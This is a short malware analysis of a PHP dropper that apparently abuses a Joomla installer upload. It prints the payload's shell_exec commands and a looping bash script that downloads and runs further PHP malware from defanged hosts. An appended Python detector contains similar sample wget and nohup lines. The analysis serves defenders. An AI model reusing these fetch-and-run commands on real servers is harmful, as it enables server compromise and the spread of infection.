Again we found new malware that tries to use PHP's shell_exec function to download and include more malware on the server.

POST Payload

This looks like a Joomla file upload vulnerability:

POST /administrator/index.php?option=com_installer&videw=install HTTP/1.0

The payload tries to upload a proc.php file to the server and execute it:


shell_exec("pkill bash 2>&1");
shell_exec("pkill sh 2>&1");
shell_exec("wget hxxp:// 2>&1");
shell_exec("nohup bash ./ & 2>&1");
shell_exec("rm 2>&1");

It tries to download a bash script and execute it. Once executed, the script removes itself and finally also removes proc.php to hide its tracks.

while :; do wget -c hxxp:// -O p.php &> /dev/null;
chmod 777 p.php &> /dev/null; php ${PWD}/p.php &> /dev/null;
wget -c hxxp:// -O h.php &> /dev/null;
chmod 777 h.php &> /dev/null; php ${PWD}/h.php &> /dev/null; sleep 3600; done

Again it downloads more malware (p.php and h.php) and executes them. These infect more PHP files.

Final words

This is only harmful if the server's PHP disable_functions setting does not include shell_exec.
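As an added example (not code from the original post), a small Python check that flags the download-then-execute chain seen in proc.php and reports which shell functions a php.ini disable_functions value leaves uncovered. The sample PHP source and the placeholder URL are constructed for the example.

```python
import re

# shell_exec is what the page's payload uses; the other functions are close
# equivalents that the same disable_functions directive should also cover.
SHELL_FUNCS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")

# Constructed sample mirroring the structure of the proc.php dropper on the page.
SAMPLE_PROC_PHP = '''<?php
shell_exec("pkill bash 2>&1");
shell_exec("wget hxxp://EXAMPLE-PLACEHOLDER/x.sh 2>&1");
shell_exec("nohup bash ./x.sh & 2>&1");
shell_exec("rm x.sh 2>&1");
'''

# A shell function called with a literal string command.
CALL_RE = re.compile(r'\b(' + '|'.join(SHELL_FUNCS) + r')\s*\(\s*(["\'])(.*?)\2', re.S)
# Download tool anywhere in the command.
DOWNLOAD_RE = re.compile(r'\b(wget|curl)\b')
# Interpreter or nohup as the first word of a command (or after ; & |),
# so "pkill bash" does not count as execution.
EXEC_RE = re.compile(r'(^|[;&|]\s*)(nohup|bash|sh|php)\b')


def find_shell_calls(php_source):
    """Return [(function, command)] for every shell call with a literal command."""
    return [(m.group(1), m.group(3)) for m in CALL_RE.finditer(php_source)]


def classify_dropper(php_source):
    """Flag the download-then-execute pattern the page describes."""
    calls = find_shell_calls(php_source)
    cmds = [c for _, c in calls]
    downloads = any(DOWNLOAD_RE.search(c) for c in cmds)
    executes = any(EXEC_RE.search(c) for c in cmds)
    return {"calls": len(calls), "downloads": downloads,
            "executes": executes, "dropper": downloads and executes}


def uncovered_functions(disable_functions_value):
    """Given a php.ini disable_functions string, list shell functions it misses."""
    disabled = {f.strip() for f in disable_functions_value.split(",") if f.strip()}
    return [f for f in SHELL_FUNCS if f not in disabled]


if __name__ == "__main__":
    print(classify_dropper(SAMPLE_PROC_PHP))
    print(uncovered_functions("exec,system"))
```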

